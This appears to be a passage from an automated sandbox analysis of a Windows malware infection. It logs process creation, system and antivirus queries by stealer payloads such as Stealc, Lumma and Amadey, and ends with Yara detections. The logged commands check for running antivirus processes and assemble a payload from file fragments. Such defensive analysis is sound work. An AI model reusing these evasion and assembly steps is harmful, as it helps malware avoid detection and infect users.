Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 607698
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MaskBathroomCompositionInjection" Participants
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\607698\Waters.pif Waters.pif Q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: axplong.exe, axplong.exe, 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: penis.exe, 00000018.00000002.2227774761.000000000339A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: penis.exe, 00000018.00000002.2227774761.000000000339A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 9_2_0022D312 cpuid

9_2_0022D312

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	16_2_0041E825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	16_2_00414138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	16_2_0041EA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	16_2_0041EBA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	16_2_0041E412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	16_2_0041ECA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	16_2_0041ED76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	16_2_0041465E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	16_2_0041E60D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	16_2_0041E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	16_2_0041E6B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	16_2_0041E79A

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000285001\2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000285001\2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000321001\2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000321001\2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Users\user\AppData\Roaming\u3uP67496d.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000285001\2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 9_2_0022CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

9_2_0022CB1A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: gold.exe, 0000000A.00000002.2010610903.00000000015F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: axplong.exe, 00000009.00000002.3837178625.0000000005CF0000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3830428963.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, gold.exe, 0000000A.00000002.2010610903.00000000015F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 22.0.Hkbsse.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.Nework.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.Hkbsse.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.axplong.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Nework.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Hkbsse.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.Hkbsse.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1448950419.0000000000211000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1394024866.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
